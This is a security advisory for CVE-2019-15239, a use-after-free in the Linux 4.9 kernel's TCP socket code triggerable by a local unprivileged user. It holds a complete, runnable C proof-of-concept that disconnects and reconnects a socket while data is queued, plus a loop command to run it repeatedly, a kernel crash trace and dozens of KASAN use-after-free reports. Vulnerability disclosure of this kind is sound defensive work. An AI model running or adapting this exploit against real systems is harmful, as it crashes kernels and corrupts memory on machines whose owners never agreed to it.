A use-after-free condition was present in the Linux 4.9 kernel TCP socket handling code, triggerable by a low privilege local user. The included POC triggers multiple read and write UAF conditions. Additionally, the POC causes a kernel crash on a vanilla Debian build.
Date Released: 14/08/2019
Author: Denis Andzakovic
Vendor Website: https://www.debian.org/
Affected Software: Linux Kernel 4.9.168 (tested on Debian's 4.9.168-1 package; see Recommendation for the other stable branches that carried the same backport and received the fix)
CVE: CVE-2019-15239
Proof-of-Concept
By queueing data on a TCP socket's write queue between a disconnect (a connect() with sa_family = AF_UNSPEC) and a subsequent reconnect, multiple use-after-free conditions can be triggered. The following POC replicates the issue. Because the POC is timing-dependent (its steps are dispatched to worker threads and may overlap), it should be run repeatedly to trigger the condition reliably, for example: `for i in {1..1000}; do ./repro; done`
#define _GNU_SOURCE
#include <endian.h>
#include <limits.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <time.h>
#include <unistd.h>
#include <linux/futex.h>
/* Block the calling thread for roughly `ms` milliseconds (usleep granularity). */
static void sleep_ms(uint64_t ms)
{
    useconds_t micros = (useconds_t)(ms * 1000);
    (void)usleep(micros);
}
/*
 * Monotonic wall-clock reading in milliseconds (CLOCK_MONOTONIC, so immune
 * to wall-clock adjustments).  A failing clock_gettime() aborts the process.
 */
static uint64_t current_time_ms(void)
{
    struct timespec now;

    if (clock_gettime(CLOCK_MONOTONIC, &now) != 0)
        exit(1);

    uint64_t ms = (uint64_t)now.tv_sec * 1000u;
    ms += (uint64_t)now.tv_nsec / 1000000u;
    return ms;
}
/*
 * Spawn a worker thread running fn(arg) on a 128 KiB stack.  The pthread_t
 * handle is discarded: nothing in this program joins or detaches the worker,
 * which is fine here because the workers loop forever (see thr()).
 * A failed pthread_create() aborts the process.
 */
static void thread_start(void *(*fn)(void *), void *arg)
{
    pthread_attr_t attr;
    pthread_t handle;

    pthread_attr_init(&attr);
    pthread_attr_setstacksize(&attr, 128 << 10);
    int rc = pthread_create(&handle, &attr, fn, arg);
    if (rc != 0)
        exit(1);
    pthread_attr_destroy(&attr);
}
/* One-shot, futex-backed flag shared between the dispatcher (loop()) and a
 * worker (thr()).  `state` is 0 while clear and 1 once set; the futex
 * syscalls in event_set()/event_wait() operate directly on this word. */
typedef struct {
int state;
} event_t;
/* Put a freshly allocated event into the clear (unset) state. */
static void event_init(event_t *ev)
{
    *ev = (event_t){ .state = 0 };
}
/* Clear a previously set event so it can be set (and waited on) again. */
static void event_reset(event_t *ev)
{
    *ev = (event_t){ .state = 0 };
}
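/*
 * Mark the event as set and wake every thread blocked on it in
 * event_wait() / event_timedwait().  Setting an event that is already set
 * is a protocol error in this dispatcher and terminates the process.
 *
 * FUTEX_WAKE takes the number of waiters to wake as its third argument;
 * omitting it from the variadic syscall() call would leave that register's
 * contents to chance, and a zero there would leave a blocked waiter asleep.
 * INT_MAX wakes all of them.
 */
static void event_set(event_t *ev)
{
    if (ev->state)
        exit(1);
    __atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
    syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, INT_MAX);
}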
/*
 * Block until the event is set.  FUTEX_WAIT with expected value 0 returns
 * immediately if the word is already non-zero, so a set that races with the
 * check is not missed; spurious wakeups simply re-check the state.
 */
static void event_wait(event_t *ev)
{
    for (;;) {
        if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE) != 0)
            return;
        syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
    }
}
/* Non-blocking probe: non-zero if the event is currently set. */
static int event_isset(event_t *ev)
{
    int state = __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
    return state;
}
/*
 * Wait up to `timeout` milliseconds for the event to become set.
 * Returns 1 once the state is observed non-zero, 0 if the deadline passes
 * first.  The futex timeout is relative and is recomputed from the elapsed
 * time on every round, so spurious wakeups do not extend the deadline.
 */
static int event_timedwait(event_t *ev, uint64_t timeout)
{
    const uint64_t started = current_time_ms();
    uint64_t elapsed = 0;

    for (;;) {
        uint64_t remain = timeout - elapsed;
        struct timespec ts = {
            .tv_sec = remain / 1000,
            .tv_nsec = (remain % 1000) * 1000 * 1000,
        };
        syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
        if (__atomic_load_n(&ev->state, __ATOMIC_RELAXED))
            return 1;
        elapsed = current_time_ms() - started;
        if (elapsed > timeout)
            return 0;
    }
}
/* Per-worker slot used by loop(): `created` is set once the thread exists,
 * `call` is the execute_call() step index handed to it, `ready` tells the
 * worker to run that step and `done` reports completion back to loop(). */
struct thread_t {
int created, call;
event_t ready, done;
};
/* Worker pool: up to 16 slots, each thread created lazily by loop(). */
static struct thread_t threads[16];
/* execute_call() is defined below without the `static` keyword; this prior
 * declaration is what gives the definition internal linkage. */
static void execute_call(int call);
/* Number of dispatched steps whose worker has not yet signalled completion. */
static int running;
/*
 * Worker thread body.  Waits for loop() to raise `ready`, runs the requested
 * execute_call() step, then decrements `running` and raises `done`.  The
 * loop never terminates; the thread lives until the process exits.
 */
static void *thr(void *arg)
{
    struct thread_t *slot = arg;

    while (1) {
        event_wait(&slot->ready);
        event_reset(&slot->ready);
        execute_call(slot->call);
        /* Order matters for loop(): the counter drops before `done` is raised. */
        __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
        event_set(&slot->done);
    }
    return NULL;
}
/*
 * Dispatch the eight execute_call() steps, one per iteration, to a lazily
 * created pool of up to 16 worker threads.  Each step goes to the first
 * slot whose `done` event is set; the dispatcher then waits at most 45 ms
 * for that worker to finish and moves on regardless, so a slow step (e.g.
 * the oversized write in step 4) can still be running while later steps
 * are issued.  If every slot were busy the step would be silently skipped
 * (not reachable with 8 steps and 16 slots).  After the last step, wait up
 * to ~100 ms for all outstanding workers to finish.
 */
static void loop(void)
{
int i, call, thread;
for (call = 0; call < 8; call++) {
for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0]));
thread++) {
struct thread_t* th = &threads[thread];
if (!th->created) {
/* First use of this slot: mark it idle (done set) and spawn the worker. */
th->created = 1;
event_init(&th->ready);
event_init(&th->done);
event_set(&th->done);
thread_start(thr, th);
}
/* Still busy with an earlier step; try the next slot. */
if (!event_isset(&th->done))
continue;
event_reset(&th->done);
th->call = call;
__atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
event_set(&th->ready);
/* Bounded wait: a slow step overlaps with the next one instead of blocking. */
event_timedwait(&th->done, 45);
break;
}
}
/* Drain: poll `running` for up to 100 x 1 ms before returning to main(). */
for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
sleep_ms(1);
}
/* Syzkaller-style "resources": r[0] is the TCP socket fd produced by step 0,
 * r[1] the fd returned by dup2() in step 3 (the same fd, see execute_call()).
 * Both start as all-ones, i.e. -1 when narrowed to an int fd. */
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
/*
 * Run one step of the generated program.  `call` selects which of the eight
 * syscalls to issue; r[0]/r[1] carry file descriptors between steps.  All
 * syscall arguments are built at fixed addresses inside the 16 MiB region
 * that main() maps at 0x20000000, which is why the code writes through raw
 * casted pointers instead of local structs -- do not "clean this up" into
 * stack variables, the addresses are part of the reproducer.  Steps run on
 * worker threads (see loop()), so a slow step can overlap with the next.
 * Return values are deliberately ignored except where a fd is captured.
 */
void execute_call(int call)
{
long res;
switch (call) {
case 0:
/* socket(2, 1, 0): AF_INET, SOCK_STREAM.  The fd becomes resource r[0]. */
res = socket(2, 1, 0);
if (res != -1)
r[0] = res;
break;
case 1:
/* bind r[0] to 224.0.0.1:20003 -- sockaddr_in {family 2, port 0x4e23,
 * addr 0xe0000001}, addrlen 16 (a multicast address; the bind result is
 * not checked). */
*(uint16_t*)0x20000000 = 2;
*(uint16_t*)0x20000002 = htobe16(0x4e23);
*(uint32_t*)0x20000004 = htobe32(0xe0000001);
bind(r[0], (void *)0x20000000, 0x10);
break;
case 2:
/* connect r[0] to 0.0.0.0:20003.  addrlen 0x1c exceeds sizeof(sockaddr_in);
 * for AF_INET the kernel presumably only consumes the first 16 bytes. */
*(uint16_t*)0x20000200 = 2;
*(uint16_t*)0x20000202 = htobe16(0x4e23);
*(uint32_t*)0x20000204 = htobe32(0);
connect(r[0], (void *)0x20000200, 0x1c);
break;
case 3:
/* dup2(fd, fd) returns fd unchanged, so r[1] aliases r[0]. */
res = dup2(r[0], r[0]);
if (res != -1)
r[1] = res;
break;
case 4:
/* write() a ~4 GiB request (0xfffffc1a bytes) starting at 0x200002c0.
 * Only 16 MiB is mapped from 0x20000000, so the copy is expected to stop
 * early (partial write / EFAULT), leaving whatever was copied queued on
 * the socket's write queue.  This step is the slow one that loop() lets
 * overlap with the following steps. */
*(uint32_t*)0x200002c0 = 0x18;
*(uint32_t*)0x200002c4 = 0;
*(uint64_t*)0x200002c8 = 2;
*(uint32_t*)0x200002d0 = 0;
*(uint32_t*)0x200002d4 = 0;
write(r[1], (void *)0x200002c0, 0xfffffc1a);
break;
case 5:
/* sendmsg(r[1], msghdr at 0x20005840, flags 1 = MSG_OOB).  Field offsets
 * assume the x86-64 struct msghdr / iovec layout: msg_name NULL, msg_iov ->
 * a 7-entry iovec array at 0x20005780 whose first entry covers 0x18 bytes
 * at 0x20000480 (the remaining six are zero-length), msg_control NULL,
 * msg_flags 0x40000 (presumably ignored on the send side).  The payload
 * bytes are opaque to TCP. */
*(uint64_t*)0x20005840 = 0;
*(uint32_t*)0x20005848 = 0;
*(uint64_t*)0x20005850 = 0x20005780;
*(uint64_t*)0x20005780 = 0x20000480;
*(uint32_t*)0x20000480 = 0x18;
*(uint16_t*)0x20000484 = 0xfff9;
*(uint16_t*)0x20000486 = 0x300;
*(uint32_t*)0x20000488 = 0x70bd27;
*(uint32_t*)0x2000048c = 0x25dfdbfc;
*(uint16_t*)0x20000490 = 8;
*(uint16_t*)0x20000492 = 0x72;
*(uint32_t*)0x20000494 = 0;
*(uint64_t*)0x20005788 = 0x18;
*(uint64_t*)0x20005790 = 0;
*(uint64_t*)0x20005798 = 0;
*(uint64_t*)0x200057a0 = 0;
*(uint64_t*)0x200057a8 = 0;
*(uint64_t*)0x200057b0 = 0;
*(uint64_t*)0x200057b8 = 0;
*(uint64_t*)0x200057c0 = 0;
*(uint64_t*)0x200057c8 = 0;
*(uint64_t*)0x200057d0 = 0;
*(uint64_t*)0x200057d8 = 0;
*(uint64_t*)0x200057e0 = 0;
*(uint64_t*)0x200057e8 = 0;
*(uint64_t*)0x20005858 = 7;
*(uint64_t*)0x20005860 = 0;
*(uint64_t*)0x20005868 = 0;
*(uint32_t*)0x20005870 = 0x40000;
sendmsg(r[1], (void *)0x20005840, 1);
break;
case 6:
/* The "disconnect" step: connect() with sa_family = 0 (AF_UNSPEC) on a
 * TCP socket dissolves the association instead of connecting.  The
 * "./file0" bytes after the family are never interpreted as an address. */
*(uint16_t*)0x20000180 = 0;
memcpy(
(void*)0x20000182,
"./"
"file0\x00",
6);
connect(r[1], (void *)0x20000180, 0x8);
break;
case 7:
/* The "reconnect" step: connect r[0] to 127.0.0.1:20003 (0x7f000001)
 * while the write queue may still hold data from steps 4/5. */
*(uint16_t*)0x20000140 = 2;
*(uint16_t*)0x20000142 = htobe16(0x4e23);
*(uint32_t*)0x20000144 = htobe32(0x7f000001);
connect(r[0], (void *)0x20000140, 0x10);
break;
}
}
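/*
 * Entry point.  Maps the fixed 16 MiB scratch region that execute_call()
 * writes its syscall arguments into, prints the PID (handy for matching the
 * "task ... /PID" in kernel logs), then runs the dispatcher.
 */
int main(void)
{
    /*
     * mmap(0x20000000, 16 MiB, PROT_READ|PROT_WRITE (3),
     *      MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS (0x32), -1, 0)
     * Without this mapping the first store in execute_call() faults, which
     * would look like a bogus crash of the reproducer itself, so the result
     * is checked rather than ignored.
     */
    long region = syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
    if (region != 0x20000000) {
        perror("mmap");
        return 1;
    }
    printf("My process ID : %d\n", getpid());
    /* Flush now: if the process dies by signal later the PID is not lost. */
    fflush(stdout);
    loop();
    return 0;
}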
A successful run of the POC above produces the following kernel crash:
[ 65.706537] BUG: unable to handle kernel NULL pointer dereference at 0000000000000008
[ 65.707195] IP: [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[ 65.707804] PGD 0
[ 65.708434] Oops: 0002 [#1] SMP
[ 65.709079] Modules linked in: iptable_filter fuse crct10dif_pclmul crc32_pclmul vmw_balloon ghash_clmulni_intel joydev serio_raw pcspkr vmw_vmci snd_ens1371 snd_ac97_codec ac97_bus gameport snd_rawmidi snd_seq_device snd_pcm snd_timer snd soundcore shpchp evdev vmwgfx ttm drm_kms_helper drm sg ac button btusb btrtl btbcm btintel bluetooth rfkill ip_tables x_tables autofs4 ext4 crc16 jbd2 crc32c_generic fscrypto ecb mbcache sr_mod cdrom sd_mod ata_generic hid_generic usbhid hid crc32c_intel aesni_intel aes_x86_64 glue_helper lrw gf128mul ablk_helper cryptd psmouse ata_piix ehci_pci e1000 uhci_hcd ehci_hcd usbcore usb_common mptspi scsi_transport_spi mptscsih mptbase i2c_piix4 libata scsi_mod
[ 65.714663] CPU: 0 PID: 612 Comm: repro Not tainted 4.9.0-9-amd64 #1 Debian 4.9.168-1
[ 65.715408] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/19/2017
[ 65.716911] task: ffff880016bc90c0 task.stack: ffffc90000974000
[ 65.717645] RIP: 0010:[<ffffffff815702c1>] [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[ 65.718405] RSP: 0018:ffffc90000977b68 EFLAGS: 00010286
[ 65.719996] RAX: 0000000000000000 RBX: ffff8800197ec600 RCX: 0000000000000001
[ 65.722660] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[ 65.727010] RBP: ffff8800197ec800 R08: 000000000000ffd7 R09: 0000000000000002
[ 65.727756] R10: 0000000000000002 R11: 0000000000000000 R12: 0000000000000000
[ 65.728507] R13: ffff880013771040 R14: 0000000000007fff R15: 0000000000007fff
[ 65.729243] FS: 0000000000000000(0000) GS:ffff88001ba00000(0000) knlGS:0000000000000000
[ 65.729939] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 65.730554] CR2: 0000000000000008 CR3: 0000000001c08000 CR4: 0000000000360670
[ 65.731224] Stack:
[ 65.731852] 0000000000000000 0000000000007fff ffff8800197ec600 0000000000000001
[ 65.732469] 0000000000000000 ffff880013771040 ffffffff81571a66 ffff880013771170
[ 65.733098] 0000000002080020 0000000000000002 00007ffe00000001 0000000000000000
[ 65.733719] Call Trace:
[ 65.734351] [<ffffffff81571a66>] ? tcp_write_xmit+0x676/0xfc0
[ 65.734967] [<ffffffff815723dd>] ? __tcp_push_pending_frames+0x2d/0xd0
[ 65.735526] [<ffffffff81564bae>] ? tcp_close+0x3fe/0x450
[ 65.736093] [<ffffffff8158e58c>] ? inet_release+0x3c/0x60
[ 65.736637] [<ffffffff814f2800>] ? sock_release+0x20/0x80
[ 65.737208] [<ffffffff814f286e>] ? sock_close+0xe/0x20
[ 65.737741] [<ffffffff8120dc48>] ? __fput+0xd8/0x220
[ 65.738280] [<ffffffff81098d5f>] ? task_work_run+0x7f/0xa0
[ 65.738847] [<ffffffff8107ed64>] ? do_exit+0x2d4/0xb60
[ 65.739403] [<ffffffff814f8003>] ? release_sock+0x43/0x90
[ 65.739994] [<ffffffff8156408f>] ? tcp_sendmsg+0x65f/0xc40
[ 65.740504] [<ffffffff8107f66a>] ? do_group_exit+0x3a/0xa0
[ 65.741131] [<ffffffff8108a5fc>] ? get_signal+0x15c/0x7f0
[ 65.741676] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.742209] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.742652] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.743265] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.743726] [<ffffffff81026456>] ? do_signal+0x36/0x6a0
[ 65.744135] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.744520] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.744952] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.745336] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.745666] [<ffffffff8102568f>] ? __switch_to+0x1ef/0x660
[ 65.746061] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.746367] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.746683] [<ffffffff81615aa1>] ? __schedule+0x241/0x6f0
[ 65.747035] [<ffffffff8120bb74>] ? vfs_write+0x144/0x190
[ 65.747349] [<ffffffff81003721>] ? exit_to_usermode_loop+0x71/0xb0
[ 65.747654] [<ffffffff81003bcd>] ? do_syscall_64+0xdd/0xf0
[ 65.748012] [<ffffffff8161a84e>] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6
[ 65.748310] Code: 00 00 8b 85 cc 00 00 00 80 8d 8e 00 00 00 02 48 03 85 d0 00 00 00 c7 40 20 01 00 01 00 48 8b 03 48 89 5d 08 48 89 45 00 48 89 2b <48> 89 68 08 41 83 85 40 01 00 00 01 31 c0 5b 5d 41 5c 41 5d 41
[ 65.749362] RIP [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[ 65.749672] RSP <ffffc90000977b68>
[ 65.750076] CR2: 0000000000000008
[ 65.750374] ---[ end trace 7d15bf5730d84780 ]---
[ 65.750670] Fixing recursive fault but reboot is needed!
Additionally, on a KASAN-instrumented kernel the POC produced the following use-after-free reports (only the summary line of each report is shown). Note that all of the following lines stem from a single execution of the POC.
BUG: KASAN: use-after-free in ip_queue_xmit+0x50b/0x750 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x1b/0x80 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x3b/0x80 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x4e/0x80 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x9f/0x750 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xba/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xdd/0x750 at addr ffff8801eb449bac - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x118/0x750 at addr ffff8801f46be37c - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3e6/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3fd/0x750 at addr ffff8801f46be382 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x180/0x750 at addr ffff8801f46be384 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1aa/0x750 at addr ffff8801f46be385 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1da/0x750 at addr ffff8801f46be388 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x20b/0x750 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x21c/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x22f/0x750 at addr ffff8801f46be944 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x24a/0x750 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x25e/0x750 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x272/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2b5/0x750 at addr ffff8801f46be380 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2f8/0x750 at addr ffff8801eb449b84 - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x31e/0x750 at addr ffff8801eb449b9c - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x79/0x270 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x8d/0x270 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xa0/0x270 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xb2/0x270 at addr ffff8801f46be37e - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x12/0x60 at addr ffff8801f46be386 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x20/0x60 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xce/0x270 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x116/0x270 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_local_out+0x27/0x60 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0x76/0x1c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xb2/0x1c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xc7/0x1c0 at addr ffff8801eb449b08 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xd7/0x1c0 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xec/0x1c0 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x25/0x310 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x206/0x310 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0xf7/0x310 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x109/0x310 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x119/0x310 at addr ffff8801f46be942 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x130/0x310 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x25/0xf0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x38/0xf0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x48/0xf0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x5a/0xf0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xaa/0x7c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xd7/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xf3/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x117/0x7c0 at addr ffff8801eb449bb0 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x13b/0x7c0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x173/0x7c0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x1d9/0x7c0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x6b4/0x7c0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x360/0x7c0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_options_echo+0x33/0x670 at addr ffff8801eb449b1c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x573/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x585/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x598/0x7c0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x5f1/0x7c0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x2cb/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x14d/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x18e/0x5a0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1a4/0x5a0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1bc/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1cc/0x5a0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x28/0x7b0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x3e/0x7b0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x52/0x7b0 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x67/0x7b0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xc5/0x7b0 at addr ffff8801eb449b9c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xf5/0x7b0 at addr ffff8801eb449b88 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x116/0x7b0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x13a/0x7b0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x4c1/0x7b0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x684/0x7b0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x699/0x7b0 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x502/0x7b0 at addr ffff8801f46be392 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x523/0x7b0 at addr ffff8801f46be390 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x1ed/0x7b0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x207/0x7b0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x288/0x7b0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x35a/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x738/0x7c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x2d/0x400 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x40/0x400 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x6e/0x400 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in nf_ct_attach+0x16/0x40 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skb+0x23/0xd0 at addr ffff8801eb449bcc - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x16/0xf0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x31/0xf0 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
